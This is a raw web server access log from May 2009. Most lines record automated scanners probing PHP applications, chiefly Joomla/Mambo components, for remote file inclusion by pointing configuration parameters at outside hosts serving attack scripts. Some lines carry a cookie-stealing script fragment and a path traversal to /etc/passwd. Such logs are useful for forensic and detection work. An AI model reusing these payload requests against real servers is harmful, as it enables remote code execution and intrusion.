122.153.212.195 - - [07/May/2009:22:50:43 -0400] "GET /logs/access_log.Q109010400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:50:46 -0400] "GET /logs/access_log.Q109010400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:50:53 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:50:53 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:50:58 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:51:02 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:15 -0400] "GET /logs//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:15 -0400] "GET //index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:15 -0400] "GET /logs/access_log.Q108101200%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:15 -0400] "GET /logs/access_log.Q108102400%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.106.15.200 - - [07/May/2009:22:51:16 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:17 -0400] "GET /logs//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:17 -0400] "GET /logs/access_log.Q108101200%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:17 -0400] "GET //index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:17 -0400] "GET /logs/access_log.Q108102400%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:22:51:18 -0400] "GET /logs/error_log.Q109033100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.116.178.20 - - [07/May/2009:22:51:22 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.15.200 - - [07/May/2009:22:51:32 -0400] "GET /logs/access_log.Q108091300//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:42 -0400] "GET /logs/access_log.Q108101200//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:51:42 -0400] "GET /logs/access_log.Q108102400//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.72.114 - - [07/May/2009:22:51:57 -0400] "GET /images/over-index13_transferunt.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.249.36.194 - - [07/May/2009:22:52:03 -0400] "GET /logs/access_log.Q108101200//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:52:04 -0400] "GET /logs/access_log.Q108102400//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:53:19 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:53:19 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:53:27 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:53:32 -0400] "GET /logs/access_log.Q108082500//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:53:39 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:54:32 -0400] "GET /logs/access_log.Q108082500//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.0.109.129 - - [07/May/2009:22:55:01 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.109.129 - - [07/May/2009:22:55:01 -0400] "GET /logs/access_log.Q108110300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.109.129 - - [07/May/2009:22:55:01 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:55:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.109.129 - - [07/May/2009:22:55:20 -0400] "GET /logs/access_log.Q108060500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.118.194.225 - - [07/May/2009:22:56:24 -0400] "GET /logs/access_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.813"
210.118.194.225 - - [07/May/2009:22:56:26 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.813"
210.118.194.225 - - [07/May/2009:22:56:26 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 351 "-" "libwww-perl/5.813"
69.89.31.105 - - [07/May/2009:22:56:40 -0400] "GET /logs/access_log.Q108090700//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.812"
69.89.31.105 - - [07/May/2009:22:56:41 -0400] "GET //ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.812"
69.89.31.105 - - [07/May/2009:22:56:41 -0400] "GET /logs//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.812"
210.118.194.225 - - [07/May/2009:22:57:41 -0400] "GET /logs/error_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.813"
121.254.231.239 - - [07/May/2009:22:57:50 -0400] "GET /produit.php?prod=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:57:50 -0400] "GET /logs/produit.php?prod=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:57:50 -0400] "GET /logs/access_log.Q109010100%20%20/produit.php?prod=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
110.45.145.92 - - [07/May/2009:22:58:04 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [07/May/2009:22:58:04 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [07/May/2009:22:58:04 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.249.36.194 - - [07/May/2009:22:58:12 -0400] "GET /logs//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:12 -0400] "GET //index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:12 -0400] "GET /logs/access_log.Q108082500//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:12 -0400] "GET /logs/access_log.Q108101900//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:22 -0400] "GET //index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:22 -0400] "GET /logs//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:22 -0400] "GET /logs/access_log.Q108082500%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:22 -0400] "GET /logs/access_log.Q108101900%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
110.45.145.92 - - [07/May/2009:22:58:25 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [07/May/2009:22:58:34 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
122.153.212.195 - - [07/May/2009:22:58:52 -0400] "GET /logs/access_log.Q109021900%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:58:53 -0400] "GET /logs/access_log.Q109010400%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:58 -0400] "GET /logs/access_log.Q108082500//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:58:58 -0400] "GET /logs/access_log.Q108101900//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.84.128.40 - - [07/May/2009:22:59:08 -0400] "GET /logs/access_log.Q108090700//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
88.84.128.40 - - [07/May/2009:22:59:08 -0400] "GET //ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
88.84.128.40 - - [07/May/2009:22:59:09 -0400] "GET /logs//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
67.202.11.155 - - [07/May/2009:22:59:13 -0400] "GET /logs/access_log.Q107080500 HTTP/1.1" 404 224 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)"
110.45.145.92 - - [07/May/2009:22:59:24 -0400] "GET /logs/access_log.Q108091300//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.249.36.194 - - [07/May/2009:22:59:43 -0400] "GET /logs/access_log.Q108082500%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:59:43 -0400] "GET /logs/access_log.Q108101900%20%20//index2.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.214.171.106 - - [07/May/2009:22:59:43 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
123.214.171.106 - - [07/May/2009:22:59:43 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
123.214.171.106 - - [07/May/2009:22:59:43 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
209.59.12.99 - - [07/May/2009:23:00:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.214.171.106 - - [07/May/2009:23:00:16 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
121.165.73.157 - - [07/May/2009:23:00:44 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.165.73.157 - - [07/May/2009:23:00:44 -0400] "GET /logs/access_log.Q108082700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
121.165.73.157 - - [07/May/2009:23:00:44 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.165.73.157 - - [07/May/2009:23:00:46 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.236.44.32 - - [07/May/2009:23:00:56 -0400] "GET /index.php?meio.php=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
222.236.44.32 - - [07/May/2009:23:00:56 -0400] "GET /logs/access_log.Q109042500/index.php?meio.php=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.44.32 - - [07/May/2009:23:00:56 -0400] "GET /logs/index.php?meio.php=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
122.153.212.195 - - [07/May/2009:23:01:15 -0400] "GET /logs/access_log.Q109021900%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.70.95.46 - - [07/May/2009:23:01:17 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
190.70.95.46 - - [07/May/2009:23:01:17 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
190.70.95.46 - - [07/May/2009:23:01:18 -0400] "GET /logs/access_log.Q108090600%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
190.96.3.175 - - [07/May/2009:23:01:28 -0400] "GET /logs/access_log.Q108090600%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 302 "-" "libwww-perl/5.812"
190.96.3.175 - - [07/May/2009:23:01:28 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.812"
190.96.3.175 - - [07/May/2009:23:01:29 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.812"
66.249.72.114 - - [07/May/2009:23:01:33 -0400] "GET /logs/error_log.Q107121000 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.212.195 - - [07/May/2009:23:02:37 -0400] "GET /logs/access_log.Q109010400%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.125.64.38 - - [07/May/2009:23:02:50 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.239.76.25 - - [07/May/2009:23:03:16 -0400] "GET /logs/index.php?meio.php=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:23:03:16 -0400] "GET /index.php?meio.php=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:23:03:16 -0400] "GET /logs/access_log.Q109042500%20%20/index.php?meio.php=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.96.3.175 - - [07/May/2009:23:03:21 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 301 "-" "libwww-perl/5.812"
190.96.3.175 - - [07/May/2009:23:03:28 -0400] "GET /logs/access_log.Q108110200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 301 "-" "libwww-perl/5.812"
190.70.95.46 - - [07/May/2009:23:03:41 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
190.70.95.46 - - [07/May/2009:23:03:55 -0400] "GET /logs/access_log.Q108110200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
122.153.212.195 - - [07/May/2009:23:04:28 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:04:28 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:04:28 -0400] "GET /logs/access_log.Q108100100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:04:31 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:04:32 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:04:32 -0400] "GET /logs/access_log.Q108100100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:04:38 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:04:43 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.109.129 - - [07/May/2009:23:04:45 -0400] "GET /logs/access_log.Q108110300%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.0.109.129 - - [07/May/2009:23:04:52 -0400] "GET /logs/access_log.Q108060500%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:23:05:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.54.137.9 - - [07/May/2009:23:05:24 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:23:05:24 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.246.101.99 - - [07/May/2009:23:05:27 -0400] "GET /logs//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=../../../../../../../../etc/passwd HTTP/1.0" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
194.246.101.99 - - [07/May/2009:23:05:27 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.rabika.ru/hk? HTTP/1.0" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
84.54.137.9 - - [07/May/2009:23:05:27 -0400] "GET /logs/access_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:23:05:31 -0400] "GET /logs/index.php?meio.php=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:23:05:31 -0400] "GET /logs/access_log.Q109042500%20%20/index.php?meio.php=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:23:05:31 -0400] "GET /index.php?meio.php=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.58.86.139 - - [07/May/2009:23:06:08 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:06:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:06:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:06:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
84.54.137.9 - - [07/May/2009:23:06:41 -0400] "GET /logs/access_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
